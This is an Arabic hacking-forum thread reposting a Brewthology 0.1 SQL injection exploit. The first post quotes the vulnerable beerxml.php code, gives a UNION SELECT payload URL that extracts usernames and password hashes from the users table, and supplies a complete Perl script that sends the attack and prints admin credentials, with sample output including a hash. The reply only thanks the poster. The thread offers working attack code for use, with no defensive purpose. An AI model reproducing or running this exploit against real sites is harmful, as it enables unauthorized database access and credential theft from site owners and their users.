Brewthology version 0.1 remote SQL injection

Brewthology version 0.1 remote SQL injection


النتائج 1 إلى 2 من 2

الموضوع: Brewthology version 0.1 remote SQL injection

  1. #1
    هكر نشيط الصورة الرمزية fouade
    تاريخ التسجيل
    Oct 2012
    الدولة
    المغرب ابو الدنيا
    المشاركات
    162

    Smile Brewthology version 0.1 remote SQL injection

    #
    كود PHP:
    Brewthology 0.1 SQL Injection Exploit
    #By cr4wl3r http://bastardlabs.info
    #Script: http://sourceforge.net/projects/brewthology/files/brewthology/v0.1%20public%20beta/
    #Demo: http://bastardlabs.info/demo/brewthology.png
    #Tested: Win 7
    #
    # Bugs found in beerxml.php
    #
    # if (isset($_GET['r'])) 
    #   { 
    #   $recipenum = $_GET['r']; 

    # // Pull Data from DB  
    #    $recipes = "SELECT * FROM bxml_recipes WHERE reciperecid=$recipenum"; 
    #    $recresult = @mysql_query ($recipes); 
    #  }
    #
    # http://bastardlabs/[path]/beerxml.php?r=[SQLi]
    # Example: http://bastardlabs/[path]/beerxml.php?r=null%20union%20select%201,2,3,4,5,concat(username,0x3a,userpass),7,8,9,10,11%20from%20bxml_users
    #
    #
    # $ perl brewthology.pl localhost /demo/
    # [+] Please Wait ...
    #
    # [+] Getting Username and Password    [ ok ]
    # [+] w00tw00t
    # [+] Username | Password --> admin:ab4d8d2a5f480a137067da17100271cd176607a1

    #!/usr/bin/perl

    use IO::Socket;

    $host $ARGV[0];
    $path $ARGV[1];

    if (@
    ARGV 2) { 

    print 
    qq(
    +---------------------------------------------+
    |    
    Brewthology 0.1 SQL Injection Exploit    |
    |                                             |
    |            
    coded exploited by cr4wl3r     |
    |                 
    http://bastardlabs.info/    |
    +---------------------------------------------+
                        -=[
    X]=-
       +---------------------------------------
        
    Usage :                                
                                               
        
    perl $<host> <path>                  
        
    ex perl $0 127.0.0.1 /Brewthology/   
                                               
       +---------------------------------------
    );
    }

    $target "http://".$host.$path."/beerxml.php?r=null%20union%20select%201,2,3,4,5,concat(username,0x3a,userpass),7,8,9,10,11%20from%20bxml_users";
    $sock IO::Socket::INET->new(Proto=>"tcp"PeerAddr=>"$host"
    PeerPort=>"80") || die "[-] Can't connect to Server   [ failed ]\n";
    print 
    "[+] Please Wait ...\n";
    print 
    $sock "GET $target HTTP/1.1\n";
    print 
    $sock "Accept: */*\n";
    print 
    $sock "User-Agent: BastardLabs\n";
    print 
    $sock "Host: $host\n";
    print 
    $sock "Connection: close\n\n";
    sleep 2;
    while (
    $answer = <$sock>) {
    if (
    $answer =~ /<USE>(.*?)<\/USE>/) {
    print 
    "\n[+] Getting Username and Password    [ ok ]\n";
    sleep 1;
    print 
    "[+] w00tw00t\n";
    print 
    "[+] Username | Password --> $1\n";
    exit();
    }
    }
    print 
    "[-] Exploit Failed !\n"

  2. #2
    هكر مجتهد الصورة الرمزية hacker zammani
    تاريخ التسجيل
    Apr 2013
    الدولة
    بغداد // العـــــــــــراق
    المشاركات
    331

    افتراضي رد: Brewthology version 0.1 remote SQL injection

    مشكـــؤر يعطيك الف عافية
    بس مافهمت شي حبي

المواضيع المتشابهه

  1. / Remote SQL Injection /ثغرة سهلة لاختراق موقع للمبتدئين
    بواسطة ArsHackEna في المنتدى قسم الثغرات
    مشاركات: 9
    آخر مشاركة: 12-22-2012, 08:17 PM
  2. كيفيه اكتشاف ثغرات Remote SQL Injection
    بواسطة BLACK.JaGuAr في المنتدى قسم الثغرات
    مشاركات: 55
    آخر مشاركة: 06-28-2012, 06:37 PM
  3. ثغره جديده { FreeNAC version 3.02 SQL Injection and XSS Vulnerabilties }
    بواسطة اخلاقي تاج راسي في المنتدى قسم الثغرات
    مشاركات: 0
    آخر مشاركة: 05-20-2012, 02:45 AM
  4. ibProArcade 2.x module (vBulletin/IPB) Remote SQL Injection Exploit
    بواسطة مهكر القلوب في المنتدى منتدى إختراق المنتديات
    مشاركات: 0
    آخر مشاركة: 04-22-2011, 02:47 AM
  5. سؤال خاص بثغرات remote sql injection
    بواسطة angel2486 في المنتدى قسم المشاكل والإستفسارات
    مشاركات: 1
    آخر مشاركة: 11-11-2010, 12:47 AM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •